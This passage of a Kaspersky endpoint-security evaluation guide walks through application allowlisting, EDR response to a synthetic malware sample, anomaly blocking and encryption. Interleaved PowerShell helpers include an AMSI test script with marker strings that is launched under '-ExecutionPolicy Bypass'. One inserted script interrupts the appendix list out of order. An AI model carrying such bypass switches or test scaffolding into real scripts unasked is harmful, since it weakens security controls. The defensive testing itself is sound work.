2. Activate Application Control; in the Action on starting applications blocked by rules section change the setting to Block and change the Application Control Mode to Allowlist. Click Configure rules. Note that in a production environment it is recommended to test Application Control with Test Mode enabled first: in Test Mode, launches that the rules would deny are only reported, so you can review which applications would be blocked and build the necessary categories before switching to Block.
3. Make sure that the Golden Image rule status is Enabled. Save and apply the policy.
4. Switch to a managed computer. Try to launch Google Chrome. Make sure the launch of Google Chrome is blocked and you see a notification from Kaspersky Endpoint Security.
5. Open the Kaspersky Endpoint Security for Windows policy and go to the Application Control settings. Click Configure rules.
6. To add a new category to the Allowlist click + Add.
7. Click Choose a category.
8. In the Application categories window click + Add.
9. Specify the name of the category: Browsers. Select Category with content added manually (data of executable files is added to the category manually).
10. In the Conditions section click + Add.
11. Select From KL category.
12. Select the Browsers group and click Next.
13. On the Conditions page click Next. On the Exclusions page click OK and confirm creation of the category.
14. Click OK twice at the bottom of the page.
15. Make sure that the rule for the Browsers category is in the Allowlist and is enabled. Save the changes and close the policy.
16. Switch to the managed device and try to launch Google Chrome. Check that it works.
After completing these steps, you have successfully demonstrated that using Kaspersky Endpoint Security for Windows you can block or allow the startup of specific applications.
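Before an administrator moves Application Control from Test Mode to Block in a real environment, the useful question is which executables on the reference machine are unsigned or signed by a publisher that no planned category covers, because those are the launches a default-deny Allowlist will stop. The following PowerShell script is an added example, not part of the original guide and not Kaspersky tooling: it walks a set of directories, records each executable's SHA-256 and Authenticode status, groups the results by publisher and exports the binaries that need attention. The directories, file extensions and output paths are illustrative choices for a golden-image machine; adjust them to your own.

```powershell
# Added example (not from the Kaspersky guide): inventory the executables on a reference
# machine before switching Application Control from Test Mode to Block, so that unsigned
# or unexpectedly signed binaries are found and categorized first.

function Get-ExecutableInventory {
    param(
        # Directories to scan; illustrative defaults for a golden-image machine.
        [string[]]$Path = @("$env:ProgramFiles", "${env:ProgramFiles(x86)}", "$env:windir\System32"),
        [string[]]$Extension = @('.exe', '.dll', '.msi', '.ps1')
    )
    foreach ($dir in $Path) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -Recurse -File -ErrorAction SilentlyContinue |
            Where-Object { $Extension -contains $_.Extension.ToLower() } |
            ForEach-Object {
                $sig       = Get-AuthenticodeSignature -FilePath $_.FullName -ErrorAction SilentlyContinue
                $status    = 'Unknown'
                $publisher = '(unsigned)'
                if ($sig) {
                    $status = [string]$sig.Status   # Valid, NotSigned, HashMismatch, NotTrusted, ...
                    if ($sig.SignerCertificate) { $publisher = $sig.SignerCertificate.Subject }
                }
                $hash      = Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
                $hashValue = $null
                if ($hash) { $hashValue = $hash.Hash }
                [pscustomobject]@{
                    Path      = $_.FullName
                    Sha256    = $hashValue
                    Status    = $status
                    Publisher = $publisher
                }
            }
    }
}

# Collect the inventory once; a full System32 walk takes several minutes.
$inventory = Get-ExecutableInventory

# Binaries that a publisher-based Allowlist will not cover: unsigned, or signed but
# failing validation (expired, revoked, tampered). In Block mode these are denied.
$needsAttention = $inventory | Where-Object { $_.Status -ne 'Valid' }

# Summary by publisher: reconcile this list with the KL categories (e.g. Browsers)
# and the custom categories you intend to put in the Allowlist.
$inventory |
    Group-Object Publisher |
    Sort-Object Count -Descending |
    Select-Object Count, Name |
    Format-Table -AutoSize

# Export both lists (paths are illustrative). The hashes can seed a hash-based
# custom category for in-house tools that are not code-signed.
$inventory      | Export-Csv -NoTypeInformation -Path "$env:USERPROFILE\Desktop\exe_inventory.csv"
$needsAttention | Export-Csv -NoTypeInformation -Path "$env:USERPROFILE\Desktop\exe_needs_attention.csv"
```

Run it elevated on the reference machine while the policy is still in Test Mode, then compare the publisher list with the Test Mode events in Kaspersky Security Center: every publisher that appears in the inventory but in none of your Allowlist categories is a future help-desk call.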
Kaspersky NEXT EDR Optimum for Windows
The following scenarios are designed to help you experience the key features of Kaspersky applications for Windows devices within the Kaspersky NEXT EDR Optimum for Windows license bundle. This license bundle contains all the features of Kaspersky NEXT EDR Foundations for Windows as well as the extra features described in this part of the document. The scenarios highlight the most important functionality and take you through how you can use these features in your own cases. You can go through them in any order or start with the one that you are most interested in.
a. EDR Optimum
b. Adaptive Anomaly Control
c. Full Disk Encryption
d. Removable drives file level encryption with portable mode
e. BitLocker management

EDR Optimum
The following scenario is designed to help you experience the features of Kaspersky Endpoint Detection and Response Optimum (requires the NEXT EDR Optimum tier license). It highlights the most important functionality and takes you through how you can use these features in your own case.
Scenario overview: In this scenario let's imagine that an attack is carried out by mailing to the organization's internal address list or in other ways. The file enters the organization's infrastructure at users' workstations. New malware arrives on the organization's PCs. The endpoint protection on some PCs may have been turned off (partially or completely) or the signatures are outdated. On one PC KES is turned on and all protection components are operating. It detects the new malware using Behavior Analysis technology and transfers the information to KSC using EDR Optimum. The Information Security Officer works with the alert in the KSC Web Console (Expert View), following the guided response feature.
Evaluation steps:
1. Enable EDR Alerts in KSC Web Console (Expert View).
2. Enable the EDR Optimum component in the policy.
3. Emulate the attack: run a test malware sample.
4. Build a threat development chain graph based on the file hash, exploit name, etc.
5. Isolate the host.
6. Prevent execution of another copy of the sample in the future.
7. Create an IoC scan task based on the detected threats and scan the entire network in order to check whether other hosts are affected.
8. Perform automatic isolation / file quarantine / scan task if other affected hosts are detected by the IoC scan task.
9. Analyze the file information on the Threat Intelligence Portal.
10. Disable the host isolation.
Preparation: Download the test sample sw_test.exe to a target workstation (contact a Kaspersky representative to request the latest version of the sample). This is a synthetic malware that is not capable of doing harm, but its behavior is similar to that of real malware.
Instructions:
Enable EDR Alerts in KSC Web Console
1. Log in to the KSC. Hover the mouse cursor over the login at the bottom of the screen and select Interface options from the menu.
2. Toggle the Show EDR alerts switch to the enabled position and click the Save button.
Enable the EDR Optimum component
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application settings tab – Detection and Response section and in the right pane click on Endpoint Detection and Response.
2. Toggle the Endpoint Detection and Response switch to the ENABLED position. Toggle the Execution Prevention switch to the ENABLED position. Select Block and write to report as the action on execution. Make sure that the padlock toggles are switched to the Enforce position. Click OK and then Save the policy.
Emulate the attack
1. Open the sw_test.exe file location. Run sw_test.exe as administrator.
2. Open the KES interface and switch to the Reports section.
3. Open the Exploit Prevention event log. Note that a threat has been detected.
4. Log in to KSC and switch to the Alerts section. Find the corresponding alert and click More details.
5. The alert card opens.
Here you can see the kill chain and other alert details. As part of the guided response there is a list of actions we recommend performing while working with the alert card. You can proceed with the alert card either using the guided response feature or by selecting the elements of the threat development chain graph. We will use both methods below in this guide.
Host Isolation
1. When you click the Isolate a computer from the network link, a dialog with a description of the current step opens. Review the description and close the tip dialog.
2. Click the Isolate computer from the network button and confirm the action by clicking the OK button in the dialog window.
3. The user will get a notification that the computer has been isolated. Now if you try to open any web page you will see a browser error confirming that network access is limited.
Execution Prevention
1. Open the alert card and select the executable file in the threat development chain graph.
2. Click the Prevent execution button and confirm the action. The file hash will be automatically added to the prevention rule list.
3. Go to the Devices – Policies & profiles section. Open the KES policy properties.
4. Open the Application settings tab, switch to the Detection and Response section and click on the Endpoint Detection and Response link.
5. Note that the executable file has been added to the prevention rules list.
6. On the managed device run sw_test.exe one more time. EDR Optimum blocks the startup of the application. Because the rule is hash-based, a modified or recompiled copy of the sample would have a different hash and would not match it; execution prevention is a containment measure for the known file, not a replacement for the detection components.
IOC Scan
Before proceeding with the following steps, copy sw_test.exe to another managed host.
1. Open the alert card and click the Search a detected threat link in the recommendations list. Review the description and close the tip dialog.
2. Mark the checkbox next to sw_test.exe in the list. Click + Create IOC.
3. Set OR as the scan condition; mark the following actions:
   - Isolate computer from the network
   - Move copy to Quarantine, delete object.
   Click Create task.
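The indicator that the console builds in the step above describes the detected file in OpenIOC form. If you need to produce such a file yourself, for instance for a sample that was found outside KSC or to hunt for a second hash at the same time, the following PowerShell function is an added example, not part of the original guide and not Kaspersky tooling. It computes the MD5 and SHA-256 of a file and emits an OpenIOC 1.0 document whose single Indicator uses OR, the same semantics as the scan condition selected in step 3, so a host matches if either hash is present. The FileItem terms are those of OpenIOC 1.0; it is an assumption that your version of Kaspersky Endpoint Security accepts this exact shape, so check the IOC file requirements in its help before importing. The sample path and output name are illustrative.

```powershell
# Added example (not from the Kaspersky guide): build an OpenIOC 1.0 file for a sample so it
# can be imported into an IOC Scan task. Hashes are computed locally; nothing executes the sample.

function New-FileHashIoc {
    param(
        [Parameter(Mandatory)][string]$FilePath,
        [Parameter(Mandatory)][string]$OutputPath,
        [string]$Description
    )
    if (-not $Description) { $Description = "Hash indicators for $(Split-Path -Leaf $FilePath)" }

    $md5    = (Get-FileHash -LiteralPath $FilePath -Algorithm MD5).Hash.ToLower()
    $sha256 = (Get-FileHash -LiteralPath $FilePath -Algorithm SHA256).Hash.ToLower()
    $now    = (Get-Date).ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ss')

    # OpenIOC gives every element its own GUID.
    $iocId       = [guid]::NewGuid().ToString()
    $indicatorId = [guid]::NewGuid().ToString()
    $md5ItemId   = [guid]::NewGuid().ToString()
    $shaItemId   = [guid]::NewGuid().ToString()

    $xml = @"
<?xml version="1.0" encoding="utf-8"?>
<ioc xmlns="http://schemas.mandiant.com/2010/ioc" id="$iocId" last-modified="$now">
  <short_description>$([System.Security.SecurityElement]::Escape($Description))</short_description>
  <authored_date>$now</authored_date>
  <definition>
    <!-- OR: a host matches if either hash is found, which is the "OR" scan condition
         chosen when the task is created in the console. -->
    <Indicator operator="OR" id="$indicatorId">
      <IndicatorItem id="$md5ItemId" condition="is">
        <Context document="FileItem" search="FileItem/Md5sum" type="mir" />
        <Content type="md5">$md5</Content>
      </IndicatorItem>
      <IndicatorItem id="$shaItemId" condition="is">
        <Context document="FileItem" search="FileItem/Sha256sum" type="mir" />
        <Content type="sha256">$sha256</Content>
      </IndicatorItem>
    </Indicator>
  </definition>
</ioc>
"@

    # Fail here, not at import time, if the document is not well-formed XML.
    $null = [xml]$xml
    # Write UTF-8 without a BOM: some importers reject a BOM in front of the XML declaration.
    [System.IO.File]::WriteAllText($OutputPath, $xml, (New-Object System.Text.UTF8Encoding($false)))
    return [pscustomobject]@{ Path = $OutputPath; Md5 = $md5; Sha256 = $sha256 }
}

# Usage (paths are illustrative); import the resulting .ioc into an IOC Scan task.
New-FileHashIoc -FilePath 'C:\Samples\sw_test.exe' -OutputPath 'C:\Samples\sw_test.ioc'
```

Hash indicators are exact-match by nature: they find further copies of this file, not variants of it. For a real incident you would add file-name, path or size terms to the same Indicator, or build a separate one, depending on whether the extra terms should widen (OR) or narrow (AND) the match.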
   You can also configure the IOC scan to run a critical areas scan, or export the IOC collection, at this step.
4. Close the alert card and switch to the Devices – Tasks section. Select the IOC Scan from alert: … task and start it.
5. Open the task properties and switch to the Results tab. Here you can see that the task has completed and the indicators of compromise were found.
6. Switch to the Application settings tab and open the IOC Scan Results section. Click the IOC detected link.
7. The IOC results window opens. Here you see the list of IOCs that were found during the scan. Click on the matched link.
8. The Alert Details window opens. Here you see where the file was located and according to which criteria it was detected.
9. Note that the network connection was limited on the managed host according to the action selected in the IOC scan task settings.
Learn more about the detected threat
1. Open the alert card and click the Kaspersky Open Threat Intelligence Portal or Kaspersky Threat Intelligence Portal link. Review the description and close the tip dialog.
2. Click on the link representing the MD5 hash. You will see a pop-up block with the links Kaspersky Open Threat Intelligence Portal and Kaspersky Threat Intelligence Portal.
3. The Kaspersky Threat Intelligence Portal web page opens. Here you can get information about the detected objects. Since we are using a synthetic sample imitating malicious activity in this example, the relevant information already exists in the online reputation database. In the case of a real unknown threat, the database might show that the file was not previously detected and that there is no information about it. A file nobody else has seen is often freshly built or targeted, so this indicates elevated risk, but it is not proof of maliciousness by itself.
Disable network isolation
1. If you need to see the list of isolated hosts, open KSC and go to the Devices – Tags – Device tags section. Click the View devices link next to the ISOLATED FROM NETWORK tag.
2. In order to cancel the network isolation, open the alert card, click Unblock computer isolated from network and confirm the action in the dialog window that appears.
3. When the host is unblocked, the user gets a notification that the network limitations have been removed.
After completing these steps, you have evaluated the Kaspersky EDR Optimum core functionality.

Adaptive Anomaly Control
This component monitors and blocks abnormal behavior of applications. By default, it operates in Smart mode. In this mode, the component collects data about applications' activities, learns, and does not block anything. If there are no detection events for 14 days, Smart mode is automatically changed to Block mode, and non-typical software activities are stopped. If there are detection events during the learning period, the administrator must react to these events (confirm the detection or add it to the exclusions). Otherwise, the learning period (Smart mode) is extended for another 14 days.
In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can block abnormal activity on the protected computers.
Evaluation steps:
1. Configure the Kaspersky Endpoint Security for Windows policy.
2. Emulate an abnormal activity on a protected computer.
3. Make sure the abnormal activity has been blocked.
Expected results: Adaptive Anomaly Control will detect and block the abnormal activity.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Adaptive Anomaly Control.
2. Check that Adaptive Anomaly Control is enabled and click Rules.
3. If it is required to approve updates for the Adaptive Anomaly Control rule list, click Approve updates.
4. For ease of demonstration we will switch one of the rules to Block mode.
Otherwise, it would be necessary to wait for 14 days minimum. Expand the Use of Windows Management Instrumentation (WMI) section and switch the Start of Microsoft HTML Application Host from WMI rule to Block mode. Save the changes and close the policy.
5. Switch to a managed device. Try to launch the WMI_HTML_Application_Host_from_WMI.bat file emulating the abnormal activity. You can request this file from [email protected]. For external customers: please contact us via a partner's representative or Kaspersky sales managers. Make sure that the file execution has been blocked and you see a corresponding notification from Kaspersky Endpoint Security.
6. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event.
In this scenario, we have demonstrated that Kaspersky Endpoint Security for Windows can block abnormal activity on the protected computers.

Full Disk Encryption
The full disk encryption feature protects data from being accessed by unauthorized persons if a laptop or a hard drive is stolen. It protects data at rest only: once the disk has been unlocked and the operating system is running, the data is available to whatever runs on the machine, so full disk encryption complements rather than replaces the protection components demonstrated above. In this scenario, we will demonstrate that using Kaspersky Endpoint Security for Windows you can implement full drive encryption on your computer.
Evaluation steps:
1. Configure and apply an encryption policy.
2. Wait until the encryption process starts.
Expected results: The hard drive is encrypted.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Data Encryption section and in the right pane click on Full Disk Encryption.
2. Select Kaspersky Disk Encryption as the encryption technology and click on the Kaspersky Disk Encryption link.
3. Change the encryption mode to Encrypt all hard drives. Select Encrypt used disk space only (reduces encryption time). Leave the other settings unchanged. Save and close the policy. Encrypting used space only is appropriate for a freshly installed test system; on a drive that previously held data, the free space may still contain remnants of deleted files, which this mode leaves unencrypted.
4. Restart the target computer. During the system reboot the Authentication Agent runs in test mode in order to ensure hardware compatibility.
5. After the reboot is completed the Encryption status of the computer changes to Applying policy. This means that the encryption process has started. You can check the status by opening the encrypted device properties – General – Protection. The disk encryption status is shown in the right pane. The encryption process runs in the background and is fully transparent to the user. It is not necessary to wait until the drive is 100% encrypted.
6. You can also check the disk drive encryption status at Operations – Data Encryption And Protection – Encrypted Drives.
7. If a user reboots the system, he will see the Authentication Agent before the OS starts.
After completing these steps, you have successfully demonstrated that using Kaspersky Endpoint Security for Windows you can implement full drive encryption on your computer.

USB File Level Encryption with portable file manager
Kaspersky Endpoint Security allows securing sensitive data with file level encryption technology when data is transferred to removable drives. In this scenario, we will demonstrate how to configure USB File Level Encryption with the portable file manager in order to ensure that sensitive data on the removable drive can be accessed only by an authorized person.
Please note that the screenshots for this scenario were captured in another testing environment due to CloudShare platform limitations, which make it impossible to emulate a flash drive. The process on new versions of Kaspersky products stays the same, but some UI elements may be slightly different.
Evaluation steps:
1. Configure and apply an encryption policy.
2. Copy a sample file to a removable drive.
3. Connect the removable drive to another computer and try to access the data.
4. Run the portable file manager and access the encrypted data.
Expected results: Data can be accessed only after authorization via the portable file manager.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Data Encryption section and in the right pane click on Encryption of removable drives.
2. Set the encryption mode to Encrypt new files only and enable Portable mode. Save the policy and close its properties. Note that Encrypt new files only protects files written after the policy takes effect; files that were already on the drive stay unencrypted.
3. After the policy is applied, when a user connects a USB drive to the computer, he sees a dialog box. If the user chooses the Do not encrypt files option, the drive is available for reading only. To be able to write to the drive, the user has to select the Encrypt files option.
4. Next, the user is asked to create a password for the portable file manager.
5. When the password is set, writing to the USB drive is allowed.
6. Create a text file (New file.txt in this example) and copy it to the USB drive. The file is encrypted as soon as it is copied to the drive. Connect the USB drive to a computer without Kaspersky Endpoint Security and try to open the newly encrypted file. You will see that the file is encrypted and its content is unreadable.
7. Now launch the portable file manager (pmv.exe) and enter the password.
8. With the portable file manager, you can access the file.
After completing these steps, you have successfully demonstrated how to configure USB File Level Encryption with the portable file manager in order to ensure that sensitive data on the removable drive can be accessed only by an authorized person.
BitLocker management
Kaspersky Endpoint Security for Windows offers BitLocker management capability in order to provide more flexible tools for drive encryption. In this scenario, we will demonstrate that using Kaspersky Endpoint Security for Windows you can encrypt hard drives with the BitLocker Drive Encryption technology.
Evaluation steps:
1. Configure and apply an encryption policy.
2. Wait until the encryption process completes.
Expected results: A hard drive is encrypted with the BitLocker Drive Encryption technology.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Data Encryption section and in the right pane click on Full Disk Encryption.
2. Select BitLocker Drive Encryption as the encryption technology and click on the BitLocker Drive Encryption link.
3. Change the encryption mode to Encrypt all hard drives. Set the other settings in accordance with your environment. Save and close the policy.
4. As soon as the policy is applied, the user is asked to set a password.
5. The drive encryption starts after the system reboot.
6. During the system reboot, the user is asked for the password in the BitLocker pre-boot authentication.
7. After the reboot you will see a message about the encryption process on the target device if you hover the mouse over the BitLocker icon.
8. After the reboot is completed the Encryption status of the computer changes to Applying policy. This means that the encryption process has started. You can check the status by opening the encrypted device properties – General – Protection. The disk encryption status is shown in the right pane. The encryption process runs in the background and is fully transparent to the user. It is not necessary to wait until the drive is 100% encrypted.
9. You can also check the disk drive encryption status at Operations – Data Encryption And Protection – Encrypted Drives.
After completing these steps, you have successfully demonstrated that using Kaspersky Endpoint Security for Windows you can encrypt hard drives with the BitLocker Drive Encryption technology.

Appendix A: POC success criteria
1. Prepare environment
   1.1. Review the requirements: POC environment meets all the imposed requirements.
   1.2. Download the required files: Installation packages are downloaded from the official web site.
   1.3. Configure the network: All the required network ports are open in the correct direction.
2. Setup and deploy
   2.1. Kaspersky Security Center deployment
      2.1.1. Install Kaspersky Security Center: Kaspersky Security Center Administration Server and Administration Consoles are installed.
   2.2. Configure Kaspersky Security Center: Quick Configuration Wizard completed successfully. Administration policies and tasks for Kaspersky applications are created. Management plug-ins and distribution packages for Kaspersky applications are added to the Kaspersky Security Center. Kaspersky Security Center is activated with a valid license.
   2.3. Deploy protection for Windows devices: Network Agent for Windows and Kaspersky Endpoint Security for Windows are installed on the target devices.
   2.4. Post-installation tasks: Security applications are activated, databases are updated, management policies are created and applied to the security applications.
3. NEXT EDR Foundations
   3.1. Web Threat Protection: Malicious URL is detected. Web access to the malicious URL is blocked.
   3.2. Network Threat Protection: Network attack and port scanning are detected.
   3.3. AMSI Protection Provider: PowerShell script execution is prevented.
   3.4. Exploit Prevention testing: Vulnerability exploitation is prevented.
   3.5. Web Control: Access to the specified web resources is denied.
   3.6. Device Control: The use of the forbidden device type is denied.
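For the BitLocker management scenario (success criterion 4.8 above), the console shows the encryption status as reported to Kaspersky Security Center. The following PowerShell script is an added example, not part of the original guide and not Kaspersky tooling: run elevated on the endpoint, it reads the BitLocker state with the built-in BitLocker module and flags any volume that is not yet in the expected end state, so the console status can be cross-checked on the device itself. It assumes the BitLocker module is present (it is on Windows 10 and 11 Pro and Enterprise) and treats the presence of a RecoveryPassword protector as the thing to check for administrative recovery; whether your KSC recovery workflow relies on exactly that protector type is an assumption to verify in your environment.

```powershell
# Added example (not from the Kaspersky guide): verify BitLocker state on the endpoint and
# cross-check it against what the KSC console reports. Requires an elevated prompt and
# the built-in BitLocker PowerShell module.

function Get-BitLockerSummary {
    # One record per volume with the facts worth comparing with the console.
    Get-BitLockerVolume | ForEach-Object {
        $protectorTypes = @($_.KeyProtector | ForEach-Object { [string]$_.KeyProtectorType })
        [pscustomobject]@{
            MountPoint          = $_.MountPoint
            VolumeStatus        = [string]$_.VolumeStatus      # FullyDecrypted, EncryptionInProgress, FullyEncrypted, ...
            EncryptionPercent   = $_.EncryptionPercentage
            EncryptionMethod    = [string]$_.EncryptionMethod  # e.g. XtsAes128, XtsAes256
            ProtectionStatus    = [string]$_.ProtectionStatus  # On once the volume key is actually protected
            KeyProtectors       = ($protectorTypes -join ', ')
            # Assumption for this check: a RecoveryPassword protector is what allows an
            # administrator to unlock the drive if the user forgets the pre-boot password.
            HasRecoveryPassword = ($protectorTypes -contains 'RecoveryPassword')
        }
    }
}

function Test-BitLockerHealthy {
    param([Parameter(Mandatory)]$Volume)
    # Expected end state of the scenario: protection on, fully encrypted, recoverable.
    return ($Volume.ProtectionStatus -eq 'On') -and
           ($Volume.VolumeStatus -eq 'FullyEncrypted') -and
           $Volume.HasRecoveryPassword
}

$summary = Get-BitLockerSummary
$summary | Format-Table -AutoSize

# Anything listed here is not yet in the expected end state. While encryption is still
# in progress this is expected; afterwards it points at a volume the policy missed.
$summary | Where-Object { -not (Test-BitLockerHealthy -Volume $_) } | ForEach-Object {
    Write-Warning ("Volume {0}: status {1} ({2}%), protection {3}, protectors [{4}]" -f
        $_.MountPoint, $_.VolumeStatus, $_.EncryptionPercent, $_.ProtectionStatus, $_.KeyProtectors)
}
```

Running this right after step 8 will normally show EncryptionInProgress with protection still off, which matches what the console reports as Applying policy; run it again once encryption has completed and every fixed volume should pass.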
   3.7. Anti-Bridging: The use of an alternative network interface is denied.
   3.8. Application Control: A Default Deny policy is applied, and an application added to the Allowlist can be launched.
4. NEXT EDR Optimum
   4.1. Emulate the attack: Attack emulated, threat development graph built.
   4.2. Execution prevention: Startup of the application blocked by EDR Optimum.
   4.3. Host isolation: Infected host isolated.
   4.4. IoC Scan: Other infected hosts detected using the IoC scan task.
   4.5. Adaptive Anomaly Control: Abnormal activity on a client device is blocked.
   4.6. Full Disk Encryption: The hard drive is encrypted with the Kaspersky encryption technology.
   4.7. USB File Level Encryption with portable file manager: Files on a USB flash drive are encrypted and can be accessed only with the portable file manager.
   4.8. BitLocker management: The hard drive is encrypted with the BitLocker technology.

Appendix B: AMSI demonstration script
bsstest_amsi.ps1:

Get-Host | Select-Object Version | Write-Host
Try {
    # Check that Invoke-Expression works normally
    $text = iex 'return "#KLBssBlockMeAmsi#"'
    # Check that Invoke-Expression content is delivered to the bases (via BssTest rules)
    iex "#KLBssTestDynamicScriptAmsi#"
}
Catch {
    # First invoke failed? Log the exception
    Write-Host $_
    # Return error code
    Write-Host "Test failed"
    exit 1
}
Try {
    # This should be blocked by the bases (KDB scan)
    iex "#KLBssBlockMeBasesKdbAmsi#"
    Write-Host "Test failed"
    exit 2
}
Catch {
    # Log the exception
    Write-Host $_
}
Try {
    # This very long string should be blocked by the bases (KDB scan)
    $str = "#KLBssBlockMeBasesKdbAmsi#" + " " + "A" * 2 * 1024 * 1024
    iex $str
    Write-Host "Test failed"
    exit 3
}
Catch {
    # Log the exception
    Write-Host $_
}
# Test succeeded - return special code
Write-Host "Test succeeded"
exit 5555
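Two things are worth knowing before and after running the Appendix B script in the AMSI Protection scenario: which AMSI providers are actually registered on the test host (if the Kaspersky policy has not reached the machine, a different provider or none at all will be doing the scanning), and what the script's exit code means. The following PowerShell script is an added example, not part of the original guide and not Kaspersky tooling. It lists the registered AMSI providers by resolving their CLSIDs to the implementing DLLs, then runs the Appendix B script in a child process with the execution policy relaxed only for that process, and interprets the exit codes that the script itself defines (5555 means both malicious-marker invocations raised the blocking exception and were caught; 2 or 3 mean a marker executed unblocked, which happens because the markers are PowerShell comments and do nothing when AMSI lets them through). The path to the script is illustrative, and the expectation of seeing a Kaspersky DLL among the providers assumes KES is installed with AMSI Protection enabled.

```powershell
# Added example (not from the Kaspersky guide): list the AMSI providers registered on the
# test host, then run the Appendix B script with the execution policy relaxed only for the
# child process and interpret its exit code.

function Get-AmsiProvider {
    # Every AMSI provider registers its COM class under this key; the CLSID is resolved
    # through HKLM\SOFTWARE\Classes to the DLL so the vendor can be recognized.
    $providersKey = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    if (-not (Test-Path -LiteralPath $providersKey)) { return @() }
    Get-ChildItem -LiteralPath $providersKey | ForEach-Object {
        $clsid  = $_.PSChildName
        $inproc = Get-ItemProperty -LiteralPath "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32" -ErrorAction SilentlyContinue
        $dll    = '(not resolved)'
        if ($inproc) { $dll = $inproc.'(default)' }
        [pscustomobject]@{ Clsid = $clsid; Dll = $dll }
    }
}

function Invoke-AmsiTestScript {
    param([Parameter(Mandatory)][string]$ScriptPath)
    # A child process means the relaxed execution policy dies with it; -NoProfile keeps
    # profile scripts out of the AMSI events you will inspect afterwards.
    $p = Start-Process -FilePath 'powershell.exe' `
        -ArgumentList @('-NoProfile', '-ExecutionPolicy', 'Bypass', '-File', "`"$ScriptPath`"") `
        -Wait -PassThru -NoNewWindow
    # Exit codes are the ones defined by the Appendix B script.
    $meaning = switch ($p.ExitCode) {
        5555    { 'Both malicious markers were blocked inside Invoke-Expression: AMSI protection is working' }
        1       { 'The harmless Invoke-Expression checks failed: the script could not run at all' }
        2       { 'Marker #KLBssBlockMeBasesKdbAmsi# executed unblocked: AMSI scanning did not stop it' }
        3       { 'The 2 MB marker string executed unblocked: AMSI scanning did not stop the long payload' }
        default { "Unexpected exit code $($p.ExitCode)" }
    }
    return [pscustomobject]@{ ExitCode = $p.ExitCode; Meaning = $meaning }
}

# 1. Who is scanning? With KES and AMSI Protection in place a Kaspersky DLL is expected here
#    (assumption, see lead-in); if no provider is listed, nothing will block the script.
Get-AmsiProvider | Format-Table -AutoSize

# 2. Run the Appendix B script (path is illustrative) and read the verdict.
Invoke-AmsiTestScript -ScriptPath "$env:USERPROFILE\Desktop\bsstest_amsi.ps1"
```

If the provider list is empty or the exit code is 2 or 3, fix the deployment (policy applied, AMSI Protection enabled, host restarted if required) before reading anything into the Recent events view in the console.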